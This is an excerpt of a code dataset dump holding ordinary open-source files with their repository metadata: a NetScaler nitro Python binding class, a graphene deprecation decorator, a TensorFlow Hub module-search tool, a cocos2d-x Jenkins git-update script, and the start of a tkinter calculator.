hexsha
stringlengths 40
40
| size
int64 2
1.02M
| ext
stringclasses 10
values | lang
stringclasses 1
value | max_stars_repo_path
stringlengths 4
245
| max_stars_repo_name
stringlengths 6
130
| max_stars_repo_head_hexsha
stringlengths 40
40
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
int64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 4
245
| max_issues_repo_name
stringlengths 6
130
| max_issues_repo_head_hexsha
stringlengths 40
40
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
int64 1
67k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 4
245
| max_forks_repo_name
stringlengths 6
130
| max_forks_repo_head_hexsha
stringlengths 40
40
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
int64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 2
1.02M
| avg_line_length
float64 1
417k
| max_line_length
int64 1
987k
| alphanum_fraction
float64 0
1
| content_no_comment
stringlengths 0
1.01M
| is_comment_constant_removed
bool 1
class | is_sharp_comment_removed
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f70b2df2d3725fc71df008004b4b4b9536a2e2e3
| 11,174
|
py
|
Python
|
nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
nssrc/com/citrix/netscaler/nitro/resource/config/lb/lbvserver_authorizationpolicy_binding.py
|
guardicore/nitro-python
|
5346a5086134aead80968f15a41ff527adaa0ec1
|
[
"Apache-2.0"
] | null | null | null |
#
# Copyright (c) 2021 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class lbvserver_authorizationpolicy_binding(base_resource) :
""" Binding class showing the authorizationpolicy that can be bound to lbvserver.
"""
def __init__(self) :
self._policyname = None
self._priority = None
self._sc = None
self._gotopriorityexpression = None
self._bindpoint = None
self._invoke = None
self._labeltype = None
self._labelname = None
self._name = None
self.___count = None
@property
def priority(self) :
r"""Priority.
"""
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
r"""Priority.
"""
try :
self._priority = priority
except Exception as e:
raise e
@property
def bindpoint(self) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE, MQTT_JUMBO_REQ.
"""
try :
return self._bindpoint
except Exception as e:
raise e
@bindpoint.setter
def bindpoint(self, bindpoint) :
r"""The bindpoint to which the policy is bound.<br/>Possible values = REQUEST, RESPONSE, MQTT_JUMBO_REQ
"""
try :
self._bindpoint = bindpoint
except Exception as e:
raise e
@property
def policyname(self) :
r"""Name of the policy bound to the LB vserver.
"""
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
r"""Name of the policy bound to the LB vserver.
"""
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def labelname(self) :
r"""Name of the label invoked.
"""
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
r"""Name of the label invoked.
"""
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def name(self) :
r"""Name for the virtual server. Must begin with an ASCII alphanumeric or underscore (_) character, and must contain only ASCII alphanumeric, underscore, hash (#), period (.), space, colon (:), at sign (@), equal sign (=), and hyphen (-) characters. Can be changed after the virtual server is created.
CLI Users: If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my vserver" or 'my vserver'). .<br/>Minimum length = 1.
"""
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
r"""Name for the virtual server. Must begin with an ASCII alphanumeric or underscore (_) character, and must contain only ASCII alphanumeric, underscore, hash (#), period (.), space, colon (:), at sign (@), equal sign (=), and hyphen (-) characters. Can be changed after the virtual server is created.
CLI Users: If the name includes one or more spaces, enclose the name in double or single quotation marks (for example, "my vserver" or 'my vserver'). .<br/>Minimum length = 1
"""
try :
self._name = name
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
r"""Expression specifying the priority of the next policy which will get evaluated if the current policy rule evaluates to TRUE.
"""
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def invoke(self) :
r"""Invoke policies bound to a virtual server or policy label.
"""
try :
return self._invoke
except Exception as e:
raise e
@invoke.setter
def invoke(self, invoke) :
r"""Invoke policies bound to a virtual server or policy label.
"""
try :
self._invoke = invoke
except Exception as e:
raise e
@property
def labeltype(self) :
r"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel.
"""
try :
return self._labeltype
except Exception as e:
raise e
@labeltype.setter
def labeltype(self, labeltype) :
r"""The invocation type.<br/>Possible values = reqvserver, resvserver, policylabel
"""
try :
self._labeltype = labeltype
except Exception as e:
raise e
@property
def sc(self) :
r"""Use SureConnect on the virtual server.<br/>Default value: OFF<br/>Possible values = ON, OFF.
"""
try :
return self._sc
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
r""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(lbvserver_authorizationpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.lbvserver_authorizationpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
r""" Returns the value of object identifier argument
"""
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def filter_add_parameters(cls, resource) :
r""" Use this function to create a resource with only add operation specific parameters.
"""
addresource = lbvserver_authorizationpolicy_binding()
addresource.name = resource.name
addresource.policyname = resource.policyname
addresource.priority = resource.priority
addresource.gotopriorityexpression = resource.gotopriorityexpression
addresource.bindpoint = resource.bindpoint
addresource.invoke = resource.invoke
addresource.labeltype = resource.labeltype
addresource.labelname = resource.labelname
return addresource
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = cls.filter_add_parameters(resource)
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i] = cls.filter_add_parameters(resource[i])
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def filter_delete_parameters(cls, resource) :
r""" Use this function to create a resource with only delete operation specific parameters.
"""
deleteresource = lbvserver_authorizationpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
deleteresource.bindpoint = resource.bindpoint
deleteresource.priority = resource.priority
return deleteresource
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = cls.filter_delete_parameters(resource)
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i] = cls.filter_delete_parameters(resource[i])
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
r""" Use this API to fetch lbvserver_authorizationpolicy_binding resources.
"""
try :
if not name :
obj = lbvserver_authorizationpolicy_binding()
response = obj.get_resources(service, option_)
else :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
r""" Use this API to fetch filtered set of lbvserver_authorizationpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
r""" Use this API to count lbvserver_authorizationpolicy_binding resources configued on NetScaler.
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
r""" Use this API to count the filtered set of lbvserver_authorizationpolicy_binding resources.
Filter string should be in JSON format.eg: "port:80,servicetype:HTTP".
"""
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Sc:
ON = "ON"
OFF = "OFF"
class Bindpoint:
REQUEST = "REQUEST"
RESPONSE = "RESPONSE"
MQTT_JUMBO_REQ = "MQTT_JUMBO_REQ"
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class lbvserver_authorizationpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.lbvserver_authorizationpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.lbvserver_authorizationpolicy_binding = [lbvserver_authorizationpolicy_binding() for _ in range(length)]
| 30.446866
| 303
| 0.727761
|
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class lbvserver_authorizationpolicy_binding(base_resource) :
def __init__(self) :
self._policyname = None
self._priority = None
self._sc = None
self._gotopriorityexpression = None
self._bindpoint = None
self._invoke = None
self._labeltype = None
self._labelname = None
self._name = None
self.___count = None
@property
def priority(self) :
try :
return self._priority
except Exception as e:
raise e
@priority.setter
def priority(self, priority) :
try :
self._priority = priority
except Exception as e:
raise e
@property
def bindpoint(self) :
try :
return self._bindpoint
except Exception as e:
raise e
@bindpoint.setter
def bindpoint(self, bindpoint) :
try :
self._bindpoint = bindpoint
except Exception as e:
raise e
@property
def policyname(self) :
try :
return self._policyname
except Exception as e:
raise e
@policyname.setter
def policyname(self, policyname) :
try :
self._policyname = policyname
except Exception as e:
raise e
@property
def labelname(self) :
try :
return self._labelname
except Exception as e:
raise e
@labelname.setter
def labelname(self, labelname) :
try :
self._labelname = labelname
except Exception as e:
raise e
@property
def name(self) :
try :
return self._name
except Exception as e:
raise e
@name.setter
def name(self, name) :
try :
self._name = name
except Exception as e:
raise e
@property
def gotopriorityexpression(self) :
try :
return self._gotopriorityexpression
except Exception as e:
raise e
@gotopriorityexpression.setter
def gotopriorityexpression(self, gotopriorityexpression) :
try :
self._gotopriorityexpression = gotopriorityexpression
except Exception as e:
raise e
@property
def invoke(self) :
try :
return self._invoke
except Exception as e:
raise e
@invoke.setter
def invoke(self, invoke) :
try :
self._invoke = invoke
except Exception as e:
raise e
@property
def labeltype(self) :
try :
return self._labeltype
except Exception as e:
raise e
@labeltype.setter
def labeltype(self, labeltype) :
try :
self._labeltype = labeltype
except Exception as e:
raise e
@property
def sc(self) :
try :
return self._sc
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
try :
result = service.payload_formatter.string_to_resource(lbvserver_authorizationpolicy_binding_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.lbvserver_authorizationpolicy_binding
except Exception as e :
raise e
def _get_object_name(self) :
try :
if self.name is not None :
return str(self.name)
return None
except Exception as e :
raise e
@classmethod
def filter_add_parameters(cls, resource) :
addresource = lbvserver_authorizationpolicy_binding()
addresource.name = resource.name
addresource.policyname = resource.policyname
addresource.priority = resource.priority
addresource.gotopriorityexpression = resource.gotopriorityexpression
addresource.bindpoint = resource.bindpoint
addresource.invoke = resource.invoke
addresource.labeltype = resource.labeltype
addresource.labelname = resource.labelname
return addresource
@classmethod
def add(cls, client, resource) :
try :
if resource and type(resource) is not list :
updateresource = cls.filter_add_parameters(resource)
return updateresource.update_resource(client)
else :
if resource and len(resource) > 0 :
updateresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
updateresources[i] = cls.filter_add_parameters(resource[i])
return cls.update_bulk_request(client, updateresources)
except Exception as e :
raise e
@classmethod
def filter_delete_parameters(cls, resource) :
deleteresource = lbvserver_authorizationpolicy_binding()
deleteresource.name = resource.name
deleteresource.policyname = resource.policyname
deleteresource.bindpoint = resource.bindpoint
deleteresource.priority = resource.priority
return deleteresource
@classmethod
def delete(cls, client, resource) :
try :
if resource and type(resource) is not list :
deleteresource = cls.filter_delete_parameters(resource)
return deleteresource.delete_resource(client)
else :
if resource and len(resource) > 0 :
deleteresources = [lbvserver_authorizationpolicy_binding() for _ in range(len(resource))]
for i in range(len(resource)) :
deleteresources[i] = cls.filter_delete_parameters(resource[i])
return cls.delete_bulk_request(client, deleteresources)
except Exception as e :
raise e
@classmethod
def get(cls, service, name="", option_="") :
try :
if not name :
obj = lbvserver_authorizationpolicy_binding()
response = obj.get_resources(service, option_)
else :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
response = obj.get_resources(service)
return response
except Exception as e:
raise e
@classmethod
def get_filtered(cls, service, name, filter_) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.filter = filter_
response = obj.getfiltered(service, option_)
return response
except Exception as e:
raise e
@classmethod
def count(cls, service, name) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
response = obj.get_resources(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
@classmethod
def count_filtered(cls, service, name, filter_) :
try :
obj = lbvserver_authorizationpolicy_binding()
obj.name = name
option_ = options()
option_.count = True
option_.filter = filter_
response = obj.getfiltered(service, option_)
if response :
return response[0].__dict__['___count']
return 0
except Exception as e:
raise e
class Sc:
ON = "ON"
OFF = "OFF"
class Bindpoint:
REQUEST = "REQUEST"
RESPONSE = "RESPONSE"
MQTT_JUMBO_REQ = "MQTT_JUMBO_REQ"
class Labeltype:
reqvserver = "reqvserver"
resvserver = "resvserver"
policylabel = "policylabel"
class lbvserver_authorizationpolicy_binding_response(base_response) :
def __init__(self, length=1) :
self.lbvserver_authorizationpolicy_binding = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.lbvserver_authorizationpolicy_binding = [lbvserver_authorizationpolicy_binding() for _ in range(length)]
| true
| true
|
f70b2e7d6d785782beab4bceff912f823fd8f608
| 2,048
|
py
|
Python
|
myvenv/Lib/site-packages/graphene/utils/deprecated.py
|
Fa67/saleor-shop
|
76110349162c54c8bfcae61983bb59ba8fb0f778
|
[
"BSD-3-Clause"
] | 1
|
2020-03-14T11:00:14.000Z
|
2020-03-14T11:00:14.000Z
|
graphene/utils/deprecated.py
|
djedi/graphene
|
2cc701f444f29fc24b4ecf801e906e0f17954c46
|
[
"MIT"
] | null | null | null |
graphene/utils/deprecated.py
|
djedi/graphene
|
2cc701f444f29fc24b4ecf801e906e0f17954c46
|
[
"MIT"
] | 1
|
2020-07-23T17:53:27.000Z
|
2020-07-23T17:53:27.000Z
|
import functools
import inspect
import warnings
string_types = (type(b''), type(u''))
def warn_deprecation(text):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
text,
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
def deprecated(reason):
"""
This is a decorator which can be used to mark functions
as deprecated. It will result in a warning being emitted
when the function is used.
"""
if isinstance(reason, string_types):
# The @deprecated is used with a 'reason'.
#
# .. code-block:: python
#
# @deprecated("please, use another function")
# def old_function(x, y):
# pass
def decorator(func1):
if inspect.isclass(func1):
fmt1 = "Call to deprecated class {name} ({reason})."
else:
fmt1 = "Call to deprecated function {name} ({reason})."
@functools.wraps(func1)
def new_func1(*args, **kwargs):
warn_deprecation(
fmt1.format(name=func1.__name__, reason=reason),
)
return func1(*args, **kwargs)
return new_func1
return decorator
elif inspect.isclass(reason) or inspect.isfunction(reason):
# The @deprecated is used without any 'reason'.
#
# .. code-block:: python
#
# @deprecated
# def old_function(x, y):
# pass
func2 = reason
if inspect.isclass(func2):
fmt2 = "Call to deprecated class {name}."
else:
fmt2 = "Call to deprecated function {name}."
@functools.wraps(func2)
def new_func2(*args, **kwargs):
warn_deprecation(
fmt2.format(name=func2.__name__),
)
return func2(*args, **kwargs)
return new_func2
else:
raise TypeError(repr(type(reason)))
| 25.283951
| 71
| 0.552246
|
import functools
import inspect
import warnings
string_types = (type(b''), type(u''))
def warn_deprecation(text):
warnings.simplefilter('always', DeprecationWarning)
warnings.warn(
text,
category=DeprecationWarning,
stacklevel=2
)
warnings.simplefilter('default', DeprecationWarning)
def deprecated(reason):
if isinstance(reason, string_types):
def decorator(func1):
if inspect.isclass(func1):
fmt1 = "Call to deprecated class {name} ({reason})."
else:
fmt1 = "Call to deprecated function {name} ({reason})."
@functools.wraps(func1)
def new_func1(*args, **kwargs):
warn_deprecation(
fmt1.format(name=func1.__name__, reason=reason),
)
return func1(*args, **kwargs)
return new_func1
return decorator
elif inspect.isclass(reason) or inspect.isfunction(reason):
func2 = reason
if inspect.isclass(func2):
fmt2 = "Call to deprecated class {name}."
else:
fmt2 = "Call to deprecated function {name}."
@functools.wraps(func2)
def new_func2(*args, **kwargs):
warn_deprecation(
fmt2.format(name=func2.__name__),
)
return func2(*args, **kwargs)
return new_func2
else:
raise TypeError(repr(type(reason)))
| true
| true
|
f70b30d771a35c7efbe0ded4d37ce49fadffd46f
| 3,958
|
py
|
Python
|
tensorflow_hub/tools/module_search/search.py
|
AyazSaiyed/hub
|
597c5726fd72d17f562bffec25e114115dadcac5
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_hub/tools/module_search/search.py
|
AyazSaiyed/hub
|
597c5726fd72d17f562bffec25e114115dadcac5
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_hub/tools/module_search/search.py
|
AyazSaiyed/hub
|
597c5726fd72d17f562bffec25e114115dadcac5
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tool to rank modules to use in a downstream classification task."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import pandas as pd
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_hub.tools.module_search import utils
FLAGS = flags.FLAGS
flags.DEFINE_string("dataset", None,
"Specification of a dataset. E.g. use `cifar10#1000` to "
"perform search using 1000 examples from tfds `cifar10` "
"dataset.")
flags.DEFINE_multi_string("module", None, "Module to consider in the search")
flags.DEFINE_string("module_list", None,
"Path to text file with a module per line to be considered in the search."
"Empty lines and lines starting with # are ignored")
def load_data(data_spec):
return utils.load_data(**data_spec)
def load_raw_features(data_spec):
data = load_data(data_spec=data_spec)
return data.map(lambda x: tf.image.resize(x["image"], (224, 224)))
def load_labels(data_spec):
data = load_data(data_spec=data_spec)
return np.array([x for x in data.map(lambda x: x["label"])])
def compute_embeddings(module_spec, data_spec):
raw_features = load_raw_features(data_spec=data_spec)
embedding_fn = utils.load_embedding_fn(
module=module_spec)
outputs = []
for batch in raw_features.batch(10):
outputs.extend(embedding_fn(batch))
return np.array(outputs)
def compute_score(module_spec, data_spec):
embeddings = compute_embeddings(module_spec=module_spec,
data_spec=data_spec)
distances = utils.compute_distance_matrix_loo(embeddings)
labels = load_labels(data_spec=data_spec)
error_rate = utils.knn_errorrate_loo(distances, labels, k=1)
return np.array(error_rate)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if not FLAGS.dataset:
raise app.UsageError("--dataset is a required argument.")
module_list = []
if FLAGS.module:
module_list.extend(FLAGS.module)
if FLAGS.module_list:
with tf.io.gfile.GFile(FLAGS.module_list) as f:
lines = f.read().split("\n")
module_list.extend([l for l in lines if l != "" and not l.startswith("#")])
ds_sections = FLAGS.dataset.split("#")
dataset = ds_sections[0]
train_examples = int(ds_sections[1]) if len(ds_sections) != 0 else None
data_spec = {
"dataset": dataset,
"split": "train",
"num_examples": train_examples,
}
results = []
for module in module_list:
results.append((
module, data_spec,
compute_score(module_spec=module, data_spec=data_spec)))
df = pd.DataFrame(results, columns=["module", "data", "1nn"])
df = df.filter(["module", "1nn"])
df.sort_values(["1nn"])
df.reset_index(drop=True)
df.set_index("module")
with pd.option_context(
"display.max_rows", None,
"display.max_columns", None,
"display.precision", 3,
"max_colwidth", -1, # Don't truncate columns (e.g. module name).
"display.expand_frame_repr", False, # Don't wrap output.
):
print("# Module ranking for %s" % data_spec)
print(df)
if __name__ == '__main__':
app.run(main)
| 31.165354
| 81
| 0.6905
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl import app
from absl import flags
import pandas as pd
import numpy as np
import tensorflow.compat.v2 as tf
from tensorflow_hub.tools.module_search import utils
FLAGS = flags.FLAGS
flags.DEFINE_string("dataset", None,
"Specification of a dataset. E.g. use `cifar10#1000` to "
"perform search using 1000 examples from tfds `cifar10` "
"dataset.")
flags.DEFINE_multi_string("module", None, "Module to consider in the search")
flags.DEFINE_string("module_list", None,
"Path to text file with a module per line to be considered in the search."
"Empty lines and lines starting with # are ignored")
def load_data(data_spec):
return utils.load_data(**data_spec)
def load_raw_features(data_spec):
data = load_data(data_spec=data_spec)
return data.map(lambda x: tf.image.resize(x["image"], (224, 224)))
def load_labels(data_spec):
data = load_data(data_spec=data_spec)
return np.array([x for x in data.map(lambda x: x["label"])])
def compute_embeddings(module_spec, data_spec):
raw_features = load_raw_features(data_spec=data_spec)
embedding_fn = utils.load_embedding_fn(
module=module_spec)
outputs = []
for batch in raw_features.batch(10):
outputs.extend(embedding_fn(batch))
return np.array(outputs)
def compute_score(module_spec, data_spec):
embeddings = compute_embeddings(module_spec=module_spec,
data_spec=data_spec)
distances = utils.compute_distance_matrix_loo(embeddings)
labels = load_labels(data_spec=data_spec)
error_rate = utils.knn_errorrate_loo(distances, labels, k=1)
return np.array(error_rate)
def main(argv):
if len(argv) > 1:
raise app.UsageError('Too many command-line arguments.')
if not FLAGS.dataset:
raise app.UsageError("--dataset is a required argument.")
module_list = []
if FLAGS.module:
module_list.extend(FLAGS.module)
if FLAGS.module_list:
with tf.io.gfile.GFile(FLAGS.module_list) as f:
lines = f.read().split("\n")
module_list.extend([l for l in lines if l != "" and not l.startswith("#")])
ds_sections = FLAGS.dataset.split("#")
dataset = ds_sections[0]
train_examples = int(ds_sections[1]) if len(ds_sections) != 0 else None
data_spec = {
"dataset": dataset,
"split": "train",
"num_examples": train_examples,
}
results = []
for module in module_list:
results.append((
module, data_spec,
compute_score(module_spec=module, data_spec=data_spec)))
df = pd.DataFrame(results, columns=["module", "data", "1nn"])
df = df.filter(["module", "1nn"])
df.sort_values(["1nn"])
df.reset_index(drop=True)
df.set_index("module")
with pd.option_context(
"display.max_rows", None,
"display.max_columns", None,
"display.precision", 3,
"max_colwidth", -1,
"display.expand_frame_repr", False, # Don't wrap output.
):
print("# Module ranking for %s" % data_spec)
print(df)
if __name__ == '__main__':
app.run(main)
| true
| true
|
f70b31d56870f47049de83d268a95ddd4d102068
| 597
|
py
|
Python
|
Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py
|
ezibyte/EziSocial-PhotoExample
|
12818880696d3f76ffd5b66646bab21fa3619821
|
[
"Apache-2.0"
] | 14
|
2015-01-29T08:41:15.000Z
|
2017-09-03T14:29:32.000Z
|
Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py
|
ezibyte/EziSocial-PhotoExample
|
12818880696d3f76ffd5b66646bab21fa3619821
|
[
"Apache-2.0"
] | 1
|
2016-09-20T10:54:53.000Z
|
2016-09-20T10:54:53.000Z
|
Cocos2dx-3x/PhotoExample/cocos2d/tools/jenkins-scripts/configs/cocos-2dx-develop-base-repo.py
|
ezibyte/EziSocial-PhotoExample
|
12818880696d3f76ffd5b66646bab21fa3619821
|
[
"Apache-2.0"
] | 22
|
2015-01-05T08:07:50.000Z
|
2019-03-25T07:52:48.000Z
|
import os
import sys
def check_ret(ret):
if(ret != 0):
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
sys.exit(1)
branchs = ['develop', 'master']
for item in branchs:
os.system('git clean -xdf -f')
os.system('git checkout -B ' + item + ' remotes/origin/' + item)
os.system('git clean -xdf -f')
ret = os.system('git pull origin')
check_ret(ret)
ret = os.system('git submodule update --init --force')
check_ret(ret)
#back to develop
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
| 25.956522
| 66
| 0.663317
|
import os
import sys
def check_ret(ret):
if(ret != 0):
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
sys.exit(1)
branchs = ['develop', 'master']
for item in branchs:
os.system('git clean -xdf -f')
os.system('git checkout -B ' + item + ' remotes/origin/' + item)
os.system('git clean -xdf -f')
ret = os.system('git pull origin')
check_ret(ret)
ret = os.system('git submodule update --init --force')
check_ret(ret)
os.system('git checkout -B develop remotes/origin/develop')
os.system('git clean -xdf -f')
| true
| true
|
f70b3234c9f1d13265bf86914670fa4ef4dbce17
| 8,382
|
py
|
Python
|
Calculator/calculator.py
|
wuhaowei/tkinter-projects
|
b2ce55d1d347316cc7d37d5180847b67c19dd413
|
[
"MIT"
] | null | null | null |
Calculator/calculator.py
|
wuhaowei/tkinter-projects
|
b2ce55d1d347316cc7d37d5180847b67c19dd413
|
[
"MIT"
] | null | null | null |
Calculator/calculator.py
|
wuhaowei/tkinter-projects
|
b2ce55d1d347316cc7d37d5180847b67c19dd413
|
[
"MIT"
] | 1
|
2021-02-20T05:29:31.000Z
|
2021-02-20T05:29:31.000Z
|
"""
Name: Tkinter Exercise - a simple calculator
Description: iOS calculator simulator
Date: 2/21/2018
Author: Haowei Wu
"""
import tkinter
class Calculator:
# Params
app_title = "A simple calculator"
disp_font = ("Helvetica", 25, "bold")
btn_font = ("Helvetica", 20, "bold")
def __init__(self, root):
self.root = root
self.initialize()
def initialize(self):
# Variables
self.ans = "0"
self.operator = None
self.user_input = ""
self.last_user_input = ""
self.is_result = False
self.ever_equals = False
self.true_equal = False
# GUI
self.set_title()
self.set_display()
self.set_buttons()
# Clear
self.clear()
def set_title(self):
self.root.title(self.app_title)
def set_display(self):
self.display = tkinter.Entry(self.root, font=self.disp_font, justify=tkinter.RIGHT)
self.display.grid(row=0, column=0, columnspan=4, sticky="news", ipady=10)
def set_buttons(self):
# row 1
self.btn_clear = tkinter.Button(self.root, text="C", font=self.btn_font, command=lambda: self.btn_press("C"))
self.btn_clear.grid(row=1, column=0, sticky="news")
self.btn_negative = tkinter.Button(self.root, text="+/-", font=self.btn_font, command=lambda: self.btn_press("+/-"))
self.btn_negative.grid(row=1, column=1, sticky="news")
self.btn_percent = tkinter.Button(self.root, text="%", font=self.btn_font, command=lambda: self.btn_press("%"))
self.btn_percent.grid(row=1, column=2, sticky="news")
self.btn_divide = tkinter.Button(self.root, text="÷", font=self.btn_font, command=lambda: self.btn_press("/"))
self.btn_divide.grid(row=1, column=3, sticky="news")
# row 2
self.btn_7 = tkinter.Button(self.root, text="7", font=self.btn_font, command=lambda: self.btn_press("7"))
self.btn_7.grid(row=2, column=0, sticky="news")
self.btn_8 = tkinter.Button(self.root, text="8", font=self.btn_font, command=lambda: self.btn_press("8"))
self.btn_8.grid(row=2, column=1, sticky="news")
self.btn_9 = tkinter.Button(self.root, text="9", font=self.btn_font, command=lambda: self.btn_press("9"))
self.btn_9.grid(row=2, column=2, sticky="news")
